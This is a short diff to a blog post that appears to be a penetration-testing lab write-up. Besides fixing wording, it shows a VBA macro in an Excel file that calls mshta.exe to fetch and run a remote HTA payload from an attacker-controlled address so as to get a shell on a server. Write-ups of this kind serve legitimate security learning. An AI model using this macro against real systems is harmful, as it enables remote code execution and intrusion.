wither/wither.github.io/_posts/2023-01-09-throwback.markdown

 So, I needed a way to use the Timesheet.xlsm to get a shell on the server.

-### Malcious VBA Macro
+### Malicious VBA Macro

-To do this, I wrote this VBA macro:
+To do this, I used this VBA macro:
 ```vba
 Sub macro()
     PID = Shell("mshta.exe http://10.50.27.129:8080/PGu0H7bw.hta")